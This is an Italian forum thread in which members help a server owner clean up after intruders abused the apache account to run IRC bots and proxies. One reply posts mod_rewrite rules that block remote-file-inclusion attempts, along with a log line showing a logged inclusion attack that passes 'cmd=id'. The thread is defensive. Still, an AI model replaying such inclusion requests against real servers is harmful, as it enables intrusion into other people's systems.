Sicurezza Server Bucato

[SergioL68]

Qualche consiglio ragazzi per cortesia, se non ve la sentite un link a qualche forum inglese anche se non sta molto bene qui.

In pratica hanno accesso al server tramite l'account apache, hanno scritto su delle dir con permessi 777 che ho immediatamente "piallato" e corretto.

Ora ci sono dei processi in esecuzione (sh chiamati da apache) che non riesco a "killare", cosa posso fare ?

[W.S.]

Se hai accesso fisico alla macchina, non è troppo sensibile... insomma se puoi farlo, stacca il/i cavo/i di rete e lavoraci con calma.

Sempre se puoi, ferma apache e non avviarlo finchè non l'hai aggiornato.

Altrimenti (o comunque):
netstat -nalp e vedi se ci sono connessioni su quei processi, se si, prova a fermarle con regole in iptables (INPUT)

poi con calma vedi i log e cosa è successo

EDIT:
Una volta che hai chiuso eventuali connessioni, organizza la sospensione del servizio, stacca la macchina e studiatela con calma.
verifica i log, dai una bella passata di chkrootkit, verifica le versioni dei software installati tenta di capire cosa è stato fatto e assicurati che non possa + succedere. Se ne hai la possibilità megli se ripristini il sistema (da immagine o backup) precedenti in modo da essere sicuro di non avere rootkit/backdoor/simili installate.

[SergioL68]

Quote:

Originariamente inviato da W.S.

Se hai accesso fisico alla macchina, non è troppo sensibile... insomma se puoi farlo, stacca il/i cavo/i di rete e lavoraci con calma.

Sempre se puoi, ferma apache e non avviarlo finchè non l'hai aggiornato.

Altrimenti (o comunque):
netstat -nalp e vedi se ci sono connessioni su quei processi, se si, prova a fermarle con regole in iptables (INPUT)

poi con calma vedi i log e cosa è successo

Grazie mille, la macchina deve lavorare purtroppo e non posso staccarla, tra l'altro è in una server farm in Inghilterra.

Più che filtrare i processi (hanno messo in condivisione dei file, film, stupidaggini del geenre) volevo eliminare il processo che hanno caricato.

Sembra lo abbiano caricato e mandato in esecuzione dal web.

Non conosci per caso un modo sicuro per uccidere un processo ?

[W.S.]

Quote:

Originariamente inviato da SergioL68

Ora ci sono dei processi in esecuzione (sh chiamati da apache) che non riesco a "killare", cosa posso fare ?

In che senso non riesci? Vengono riavviate immediatamente? Non succede nulla? Ti ritorna qualche errore?

[W.S.]

questo potrebbe aiutarti:
http://www.linuxquestions.org/questi...d.php?t=561867

[SergioL68]

Quote:

Originariamente inviato da W.S.

In che senso non riesci? Vengono riavviate immediatamente? Non succede nulla? Ti ritorna qualche errore?

Il processo sembra in effetti non essere ucciso, ma probabilmente viene ricaricato immediatamente.
sh un file che non trovo neppure, chiamato da apache, non vorrei mai che fosse un ssh.

[W.S.]

vedi tramite ps che abbia pid diversi dopo ogni kill -9
sh immagino sia /bin/sh credo usino sh come interprete a qualche script..
ora devo staccare, torno nel pomeriggio

[SergioL68]

Ok, fatto fuori, era un altro processo lanciato in perl tramite l'apache che lo richiamava.

Ora vediamo se trovano altri buchi....




Dimenticavo, Grazie

[W.S.]

figurati

Per curiosità, il software installato dagli attaccanti rendeva disponibile materiale (video/mp3/warez) ad un canale irc? Ti hanno per caso lasciato i sorgenti da qualche parte?

[stefanoxjx]

Deve essere una cosa simile a quella che è capitata a me.
Prova a vedere nella discussione che avevo aperto a suo tempo.

Ciao.

[W.S.]

Quote:

Originariamente inviato da stefanoxjx

Deve essere una cosa simile a quella che è capitata a me.
Prova a vedere nella discussione che avevo aperto a suo tempo.

Ciao.

esatto, volevo capire se sono gli stessi

[stefanoxjx]

Quote:

Originariamente inviato da W.S.

esatto, volevo capire se sono gli stessi

L'avevo intuito

[W.S.]

Quote:

Originariamente inviato da stefanoxjx

L'avevo intuito

hehe

[darkbasic]

Quote:

Originariamente inviato da stefanoxjx

L'avevo intuito

Ci credi che ho pensato subito a te appena ho letto il topic?

[stefanoxjx]

Quote:

Originariamente inviato da darkbasic

Ci credi che ho pensato subito a te appena ho letto il topic?

Assolutamente SI!!!

[SergioL68]

Quote:

Originariamente inviato da stefanoxjx

Deve essere una cosa simile a quella che è capitata a me.
Prova a vedere nella discussione che avevo aperto a suo tempo.

Ciao.

Si, cosa molto simile, io non ho FlatNuke, ma uso vbulletin con diversi mods ed ho alcuni e-commerce sul server, è una situazione piuttosto delicata, qui hanno installato proxy, IRC EggDrop, processi cron, fake apache ed altre cosette.
Riesco a fermare i processi e credo di avere pulito tutto, ma non capisco da dove sono entrati.
Vorrei capire quello per correggerlo e fare in modo che la cosa non si ripeta.

[cionci]

Sicuramente se sono riusciti ad entrare in quel modo, avranno anche pulito i vari log...
Prova a guardare il log di apache...

Che tipo di mod hai installato per vbulletin...qualsiasi mod che esegua qualche processo locale può essere l'indiziata...a meno che non abbiano sfruttato qualche exploit di Apache o MySQL, che versioni sono entrambi ?

[W.S.]

Pure io credo siano entrati da qualche bug nelle applicazioni web, scarterei l'ipotesi di un attacco diretto ad apache (anche se possibile, la ritengo meno probabile). Contando che l'utente utilizzato è apache, scarterei anche l'attacco al db o ad altri demoni.

Oltre ai log dai pure un'occhio ai db, potrebbe esserci qualche record "sporcato" dall'attacco, magari riesci a farti un'idea del modulo sfruttato. Certo non sarà facilissimo trovarlo (se c'è) visto che avrai parecchi record immagino ma penso almeno un tentativo vada fatto.

Consiglio pure di verificare che i moduli e le applicazioni web siano ancora le stesse che hai installato, è probabile che abbiano installato qualche backdoor (anche una stupidissima funzione php).

[gurutech]

Quote:

Originariamente inviato da SergioL68

Qualche consiglio ragazzi per cortesia, se non ve la sentite un link a qualche forum inglese anche se non sta molto bene qui.

ciao,
a me tempo fa sono entrati da una pagina php tramite un cross site scripting.
da allora sto molto più attento al codice che scrivo, ed inoltre ho messo apache in chroot con questa modifica ad httpd.conf

Codice:

RewriteEngine on
RewriteLog /logs/rewrite.log
RewriteLogLevel 9
RewriteCond %{THE_REQUEST} php[^\ ]*(http|%68|%74|%70|%48|%54|%50) [NC]
RewriteRule . http://www.fuckyou.com/ [R]
RewriteCond %{THE_REQUEST} [?][^\ ]*(http|%68|%74|%70|%48|%54|%50) [NC]
RewriteRule . http://www.fuckyou.com/ [R]
RewriteCond %{THE_REQUEST} [?][^\ ]*([:][/][/]|%3a%2f%2f) [NC]
RewriteRule . http://www.fuckyou.com/ [R]

adesso quando fanno certe visitine nel log succede questo:

Codice:

81.208.36.87 - - [19/Jun/2007:10:42:36 +0200] [www.gurutech.it/sid#8126750][rid#85534a8/initial] (2) init rewrite engine with requested uri /index.php
81.208.36.87 - - [19/Jun/2007:10:42:36 +0200] [www.gurutech.it/sid#8126750][rid#85534a8/initial] (3) applying pattern '.' to uri '/index.php'
81.208.36.87 - - [19/Jun/2007:10:42:36 +0200] [www.gurutech.it/sid#8126750][rid#85534a8/initial] (4) RewriteCond: input='GET /index.php?sel=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1' pattern='php[^\]*(http|%68|%74|%70|%48|%54|%50)' [NC] => matched
81.208.36.87 - - [19/Jun/2007:10:42:36 +0200] [www.gurutech.it/sid#8126750][rid#85534a8/initial] (2) rewrite '/index.php' ->'http://www.fuckyou.com/'

inoltre ho riscritto index.php in modo da accettare solo file che dico io

Codice:

$lista=file("/listafile",FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);

$sel=$_GET['sel']
        or $sel="start";
if ( ! in_array($sel,$lista) ) {
        $sel="start";
}

[darkbasic]

Quote:

Originariamente inviato da gurutech

adesso quando fanno certe visitine nel log succede questo

Troppo bello!!!